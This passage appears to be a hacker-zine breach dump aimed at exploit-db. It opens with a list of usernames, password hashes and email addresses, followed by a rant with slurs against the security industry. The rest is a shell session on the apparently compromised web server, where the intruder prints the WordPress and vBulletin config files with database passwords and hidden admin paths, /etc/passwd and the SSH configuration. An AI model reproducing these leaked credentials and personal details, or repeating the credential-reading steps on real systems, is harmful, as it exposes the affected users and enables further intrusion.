Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester
m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester
Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester
MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester
Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester
garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester
Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester
mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester
stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester
DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester
cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester
Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester
SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker
LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum
megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it:
Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor
daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor


____________________________________________________|_._._._._._._._,
\___________________________________________________|_|_|_|_|_|_|_|_|
! ~ exploit-db ~

Now we come to a different topic. A topic about people who leech off
what the scene creates and call it their own. About people who
copyright ideas and papers about security related topics that have
been around for years. How many XSS-Papers are there currently on
exploit-db? How many retarded strcpy(buf, argv[1])-papers are being
written over and over again? About whitehats who think releasing
exploits would make the world much more safe. And because of fame.
They all want fame so badly that they do anything and everything in
order to be part of the security industry. What's even more hilarious
is that these "famous" security people keep getting owned. We mean
el8, phc, h0no, and zf0 have all owned these "Security Rockstar"
faggots and yet, nothing changes. Or the attacks are categorized as
"skiddy" behavior. It's rediculous how terrible the industry is. There
is no accountability anymore.

Still there are some lame skids that need a good spanking. Stupid 10
year olds who take perl-exploits to destroy clan-pages for fun and
call themselves "hackers" without knowing what they are doing.
Criminals who take exploits to steal payment stuff for their own
selfish financial gain. And to get their friends thrown in jail
(soup). Fame and money... Get the message?

$ uname -a
Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ pwd
/var/www

$ ls -la
total 24180
drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 .
drwxr-xr-x 19 root root 4096 Sep 24 09:26 ..
-rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess
-rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save
-rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734
-rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php
-rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
-rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html
-rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt
drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners
-rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico
-rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt
-rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt
drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums
drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404
-rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php
-rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php
-rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html
-rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt
-rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml
drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images
-rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php
drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads
-rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php
drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies
-rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php
drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default
-rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html
-rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt
-rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html
-rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt
-rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml
-rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php
drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts
-rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php
-rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php
-rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml
-rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl
-rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml
-rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz
drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider
drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits
-rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css
drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme
-rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php
-rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt
-rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php
drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos
-rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php
drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin
-rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php
-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php
-rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php
-rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php
-rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php
drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content
-rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php
-rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php
drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes
-rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php
-rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php
-rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php
-rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php
-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php
-rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php
-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php
-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php
-rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php
-rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php
-rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php
-rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php
-rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php


$ cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information by
* visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
//define('DB_NAME', 'explot2');
define('WP_CACHE', true); //Added by WP-Cache Manager
define('DB_NAME', 'edb_new');

/** MySQL database username */
define('DB_USER', 'edbuser');

/** MySQL database password */
//define('DB_PASSWORD', 'admin123');
define('DB_PASSWORD', '2834729347928372342');
//define('DB_PASSWORD', 'f00b204e98009d22b68e54a');

/** MySQL hostname */
define('DB_HOST', 'localhost');
define('WP_MEMORY_LIMIT', '1024M');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
define('FORCE_SSL_LOGIN', true);

/**#@+
* Authentication Unique Keys.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
* You can change these at any point in time to invalidate all existing cookies. This will force all users
in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/

$table_prefix = 'wp_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de.mo to wp-content/languages and set WPLANG to 'de' to enable German
* language support.
*/

define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_DEBUG',true);
define('WP_MEMORY_LIMIT', '128M');

$ cd forums

$ ls -la
total 2344
drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 .
drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 ..
-rw-r--r-- 1 www-data www-data 1008 Nov 6 12:03 .htaccess
-rw-rw-r-- 1 www-data www-data 17862 Nov 22 20:01 LICENSE
drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp
drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp-23987239874298273987234
-rwxr-xr-x 1 www-data www-data 40193 Nov 22 20:01 ajax.php
-rwxr-xr-x 1 www-data www-data 75603 Nov 22 20:01 album.php
-rwxr-xr-x 1 www-data www-data 19119 Nov 22 20:01 announcement.php
drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 archive
-rwxr-xr-x 1 www-data www-data 9040 Nov 22 20:01 asset.php
-rwxr-xr-x 1 www-data www-data 21161 Nov 22 20:01 assetmanage.php
-rwxr-xr-x 1 www-data www-data 15788 Nov 22 20:01 attachment.php
-rwxr-xr-x 1 www-data www-data 6935 Nov 22 20:01 attachment_inlinemod.php
-rwxr-xr-x 1 www-data www-data 3616 Nov 22 20:01 blog_attachment.php
-rwxr-xr-x 1 www-data www-data 96121 Nov 22 20:01 calendar.php
-rwxr-xr-x 1 www-data www-data 43 Nov 22 20:01 clear.gif
drwxr-xr-x 9 www-data www-data 4096 Nov 6 11:22 clientscript
-rwxr-xr-x 1 www-data www-data 15786 Nov 22 20:01 converse.php
drwxr-xr-x 7 www-data www-data 4096 Nov 6 11:22 cpstyles
-rwxr-xr-x 1 www-data www-data 3309 Nov 22 20:01 cron.php
-rwxr-xr-x 1 www-data www-data 6145 Nov 22 20:01 css.php
drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customavatars
drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customgroupicons
drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 customprofilepics
-rwxr-xr-x 1 www-data www-data 1823 Nov 22 20:01 editor.php
-rwxr-xr-x 1 www-data www-data 47010 Nov 22 20:01 editpost.php
-rwxr-xr-x 1 www-data www-data 1427 Nov 22 20:01 entry.php
-rwxr-xr-x 1 www-data www-data 30084 Nov 22 20:01 external.php
-rwxr-xr-x 1 www-data www-data 9966 Nov 22 20:01 faq.php
-rwxr-xr-x 1 www-data www-data 10134 Nov 22 20:01 favicon.ico
-rwxr-xr-x 1 www-data www-data 23332 Nov 22 20:01 forum.php
-rwxr-xr-x 1 www-data www-data 42452 Nov 22 20:01 forumdisplay.php
-rwxr-xr-x 1 www-data www-data 2066 Nov 22 20:01 global.php
-rwxr-xr-x 1 www-data www-data 155838 Nov 22 20:01 group.php
-rwxr-xr-x 1 www-data www-data 26150 Nov 22 20:01 group_inlinemod.php
-rwxr-xr-x 1 www-data www-data 11883 Nov 22 20:01 groupsubscription.php
-rwxr-xr-x 1 www-data www-data 9039 Nov 22 20:01 image.php
drwxr-xr-x 24 www-data www-data 4096 Nov 6 13:16 images
drwxr-xr-x 8 www-data www-data 12288 Nov 6 14:29 includes
-rwxr-xr-x 1 www-data www-data 2396 Nov 22 20:01 index.php
-rwxr-xr-x 1 www-data www-data 47021 Nov 22 20:01 infraction.php
-rwxr-xr-x 1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
-rwxr-xr-x 1 www-data www-data 11440 Nov 22 20:01 joinrequests.php
-rwxr-xr-x 1 www-data www-data 1757 Nov 22 20:01 list.php
-rwxr-xr-x 1 www-data www-data 10947 Nov 22 20:01 login.php
-rwxr-xr-x 1 www-data www-data 30244 Nov 22 20:01 member.php
-rwxr-xr-x 1 www-data www-data 16392 Nov 22 20:01 member_inlinemod.php
-rwxr-xr-x 1 www-data www-data 40345 Nov 22 20:01 memberlist.php
-rwxr-xr-x 1 www-data www-data 22264 Nov 22 20:01 misc.php
drwxr-xr-x 2 www-data www-data 4096 Nov 22 20:01 modcp
drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:55 modcp-23987239874298273987234
-rwxr-xr-x 1 www-data www-data 76827 Nov 22 20:01 moderation.php
-rwxr-xr-x 1 www-data www-data 6779 Nov 22 20:01 moderator.php
-rwxr-xr-x 1 www-data www-data 17552 Nov 22 20:01 newattachment.php
-rwxr-xr-x 1 www-data www-data 41079 Nov 22 20:01 newreply.php
-rwxr-xr-x 1 www-data www-data 20185 Nov 22 20:01 newthread.php
-rwxr-xr-x 1 www-data www-data 21802 Nov 22 20:01 online.php
drwxr-xr-x 5 www-data www-data 4096 Nov 6 11:22 packages
-rwxr-xr-x 1 www-data www-data 8096 Nov 22 20:01 payment_gateway.php
-rwxr-xr-x 1 www-data www-data 13360 Nov 22 20:01 payments.php
-rwxr-xr-x 1 www-data www-data 4156 Nov 22 20:01 picture.php
-rwxr-xr-x 1 www-data www-data 16665 Nov 22 20:01 picture_inlinemod.php
-rwxr-xr-x 1 www-data www-data 26169 Nov 22 20:01 picturecomment.php
-rwxr-xr-x 1 www-data www-data 29338 Nov 22 20:01 poll.php
-rwxr-xr-x 1 www-data www-data 10414 Nov 22 20:01 posthistory.php
-rwxr-xr-x 1 www-data www-data 76585 Nov 22 20:01 postings.php
-rwxr-xr-x 1 www-data www-data 7087 Nov 22 20:01 printthread.php
-rwxr-xr-x 1 www-data www-data 79435 Nov 22 20:01 private.php
-rwxr-xr-x 1 www-data www-data 163695 Nov 22 20:01 profile.php
-rwxr-xr-x 1 www-data www-data 56363 Nov 22 20:01 register.php
-rwxr-xr-x 1 www-data www-data 7294 Nov 22 20:01 report.php
-rwxr-xr-x 1 www-data www-data 14765 Nov 22 20:01 reputation.php
-rwxr-xr-x 1 www-data www-data 35793 Nov 22 20:01 search.php
-rwxr-xr-x 1 www-data www-data 22710 Nov 22 20:01 sendmessage.php
-rwxr-xr-x 1 www-data www-data 12485 Nov 22 20:01 showgroups.php
-rwxr-xr-x 1 www-data www-data 12738 Nov 22 20:01 showpost.php
-rwxr-xr-x 1 www-data www-data 80115 Nov 22 20:01 showthread.php
drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 signaturepics
drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 store_sitemap
-rwxr-xr-x 1 www-data www-data 38862 Nov 22 20:01 subscription.php
-rwxr-xr-x 1 www-data www-data 5399 Nov 22 20:01 tags.php
-rwxr-xr-x 1 www-data www-data 8800 Nov 22 20:01 threadrate.php
-rwxr-xr-x 1 www-data www-data 11146 Nov 22 20:01 threadtag.php
-rwxr-xr-x 1 www-data www-data 61 Nov 22 20:01 uploadprogress.gif
-rwxr-xr-x 1 www-data www-data 39717 Nov 22 20:01 usercp.php
-rwxr-xr-x 1 www-data www-data 21034 Nov 22 20:01 usernote.php
drwxr-xr-x 13 www-data www-data 4096 Nov 6 11:22 vb
drwxr-xr-x 8 www-data www-data 4096 Nov 6 12:23 vboptimise
-rw-r--r-- 1 www-data www-data 2324 Nov 6 12:23 vboptimise.php
drwxr-xr-x 4 www-data www-data 4096 Nov 6 11:55 vbseo
-rw-r--r-- 1 www-data www-data 45286 Nov 6 11:55 vbseo.php
drwxr-xr-x 4 www-data www-data 4096 Nov 6 14:29 vbseo_sitemap
-rw-r--r-- 1 www-data www-data 4335 Nov 6 11:55 vbseocp.php
-rwxr-xr-x 1 www-data www-data 27879 Nov 22 20:01 visitormessage.php
-rwxr-xr-x 1 www-data www-data 1761 Nov 22 20:01 widget.php
-rwxr-xr-x 1 www-data www-data 3952 Nov 22 20:01 xmlsitemap.php

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.8
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is �2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/


/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/


// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP
5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'edbforum';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'dbmaster@example.com';

// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
//
// Note: If you are using IIS 7+ and MySQL is on the same machine, you
// need to use 127.0.0.1 instead of localhost
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'forums';
$config['MasterServer']['password'] = '2834725234523472342';

// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
$config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';

// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';

// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/


// ****** The following options are only needed in special cases ******

// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger image
s, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 10:22, Sat Nov 6th 2010
|| # CVS: $RCSfile$ - $Revision: 39199 $
|| ####################################################################
\*======================================================================*/


$ cd /

$ ls -la
total 112
drwxr-xr-x 26 root root 4096 Nov 30 06:53 .
drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
drw------- 2 root root 4096 Dec 4 03:45 backup
drw------- 2 root root 4096 Sep 1 07:38 backup-fix
drwxr-xr-x 2 root root 4096 Oct 11 09:00 bin
drwxr-xr-x 3 root root 4096 Nov 30 06:53 boot
drwxr-xr-x 3 root root 4096 Nov 11 16:56 build
drwxr-xr-x 2 root root 4096 Jul 9 05:29 cdrom
drwxr-xr-x 14 root root 3800 Nov 30 06:53 dev
drwxr-xr-x 91 root root 4096 Dec 2 06:34 etc
drwxr-xr-x 3 root root 4096 Aug 3 11:48 home
lrwxrwxrwx 1 root root 32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib
lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib
drwx------ 2 root root 16384 Jul 9 05:28 lost+found
drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint
drwxr-xr-x 3 root root 4096 Jul 9 05:28 media
drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt
drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt
dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc
drwx------ 9 root root 4096 Nov 25 09:08 root
drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv
drwxr-xr-x 13 root root 0 Nov 11 10:45 sys
drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp
drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr
drwxr-xr-x 19 root root 4096 Sep 24 09:26 var
lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
ossec:x:1004:1003::/var/ossec:/bin/false
ossecm:x:1005:1003::/var/ossec:/bin/false
ossecr:x:1006:1003::/var/ossec:/bin/false

$ cat /etc/issue
Ubuntu 10.04.1 LTS \n \l


$ cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys

